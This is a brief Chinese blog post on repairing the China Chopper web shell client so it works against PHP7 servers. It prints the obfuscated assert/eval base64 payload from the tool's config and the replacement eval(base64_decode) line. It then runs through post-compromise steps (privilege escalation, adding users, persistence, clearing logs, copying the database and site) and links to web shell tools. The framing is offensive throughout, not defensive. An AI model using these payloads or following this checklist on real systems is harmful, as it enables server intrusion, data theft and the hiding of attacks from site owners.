前言
逆天還是上學那會玩滲透的,后來工作后就再也沒碰了,所以用的工具還是以前經典款,這不,發現出問題了
問題
如果是PHP5則沒有問題,如果是PHP7,會出現:Cannot call assert() with string argument dynamically的提示
解決
用谷歌搜了下,發現了這篇解釋:https://www.freebuf.com/articles/web/197013.html
知道了本質就簡單了,菜刀這個軟件之所以經典就是因為它的靈活性很強,修改下配置文件即可
PS:把
array_map("ass"."ert",array("ev"."Al(\"\\\$xx%%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('%s'));\");"));改成eval(base64_decode('%s'));即可
這時候文件管理的功能就能使用了,下面就是常規操作了(文件上傳下載、大馬、提權、建用戶、遠程連接、權限維持、清日記...)
PS:copy數據庫、網站,本地搭建一個和服務器一樣的環境,進一步探索與發現~~~
附錄
菜刀下載:https://github.com/raddyfiy/caidao-official-version
取代菜刀:蟻劍:https://github.com/AntSwordProject/AntSword-Loader or Cknife:https://github.com/Chora10/Cknife